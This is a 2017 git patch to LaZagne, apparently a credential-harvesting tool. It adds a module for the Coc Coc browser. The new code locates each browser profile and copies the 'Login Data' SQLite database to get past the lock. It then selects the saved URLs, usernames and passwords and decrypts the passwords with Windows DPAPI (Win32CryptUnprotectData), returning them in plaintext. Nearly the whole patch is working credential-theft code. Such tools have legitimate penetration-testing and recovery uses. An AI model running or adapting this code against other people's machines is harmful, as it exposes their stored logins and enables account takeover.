From aea492931b945470776cb3afb2dbafbc041ce242 Mon Sep 17 00:00:00 2001 From: AlessandroZ Date: Thu, 31 Aug 2017 13:51:05 +0200 Subject: [PATCH] new module: coccoc browser --- Windows/lazagne/config/manageModules.py | 2 + Windows/lazagne/softwares/browsers/coccoc.py | 97 ++++++++++++++++++++ 2 files changed, 99 insertions(+) create mode 100755 Windows/lazagne/softwares/browsers/coccoc.py diff --git a/Windows/lazagne/config/manageModules.py b/Windows/lazagne/config/manageModules.py index 43e92616..09773241 100755 --- a/Windows/lazagne/config/manageModules.py +++ b/Windows/lazagne/config/manageModules.py @@ -1,6 +1,7 @@ # browsers from lazagne.softwares.browsers.mozilla import Mozilla from lazagne.softwares.browsers.chrome import Chrome +from lazagne.softwares.browsers.coccoc import CocCoc from lazagne.softwares.browsers.opera import Opera from lazagne.softwares.browsers.ie import IE # windows @@ -76,6 +77,7 @@ def get_modules(): Autologon(), Dbvisualizer(), Chrome(), + CocCoc(), CoreFTP(), Cyberduck(), Filezilla(), diff --git a/Windows/lazagne/softwares/browsers/coccoc.py b/Windows/lazagne/softwares/browsers/coccoc.py new file mode 100755 index 00000000..a1da80f5 --- /dev/null +++ b/Windows/lazagne/softwares/browsers/coccoc.py @@ -0,0 +1,97 @@ +from lazagne.config.write_output import print_debug +from lazagne.config.moduleInfo import ModuleInfo +from lazagne.config.WinStructure import * +from lazagne.config.constant import * +import sqlite3 +import shutil +import json +import os + +class CocCoc(ModuleInfo): + def __init__(self): + options = {'command': '-coccoc', 'action': 'store_true', 'dest': 'coccoc', 'help': 'coccoc'} + ModuleInfo.__init__(self, 'coccoc', 'browsers', options) + + # main function + def run(self, software_name = None): + homedrive = constant.profile['HOMEDRIVE'] + homepath = constant.profile['HOMEPATH'] + + # all possible path + pathTab = [ + homedrive + homepath + '\\Local Settings\\Application Data\\CocCoc\\Browser\\User Data', + homedrive + homepath + '\\AppData\\Local\\CocCoc\\Browser\\User Data', + ] + + application_path = [p for p in pathTab if os.path.exists(p)] + if not application_path: + print_debug('INFO', 'Cococ not installed.') + return + + # keep the first existing path + application_path = application_path[0] + + # try to list all users profile + profiles = [] + if os.path.exists(os.path.join(application_path, 'Local State')): + with open(os.path.join(application_path, 'Local State')) as file: + try: + data = json.load(file) + for profile in data['profile']['info_cache']: + profiles.append(profile) + except: + pass + + if not profiles: + profiles.append('Default') + + pwdFound = [] + for profile in profiles: + database_path = os.path.join(application_path, profile, 'Login Data') + if not os.path.exists(database_path): + print_debug('INFO', 'User database not found') + continue + + # Copy database before to query it (bypass lock errors) + try: + shutil.copy(database_path, os.path.join(os.getcwd(), 'tmp_db')) + database_path = os.path.join(os.getcwd(), 'tmp_db') + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) + print_debug('ERROR', 'An error occured copying the database file') + + # Connect to the Database + try: + conn = sqlite3.connect(database_path) + cursor = conn.cursor() + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) + print_debug('ERROR', 'An error occured opening the database file') + continue + + # Get the results + try: + cursor.execute('SELECT action_url, username_value, password_value FROM logins') + except: + print_debug('ERROR', 'Cococ seems to be used, the database is locked. Kill the process and try again !') + continue + + for result in cursor.fetchall(): + try: + # Decrypt the Password + password = Win32CryptUnprotectData(result[2]) + pwdFound.append( + { + 'URL' : result[0], + 'Login' : result[1], + 'Password' : password + } + ) + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) + + conn.close() + if database_path.endswith('tmp_db'): + os.remove(database_path) + + return pwdFound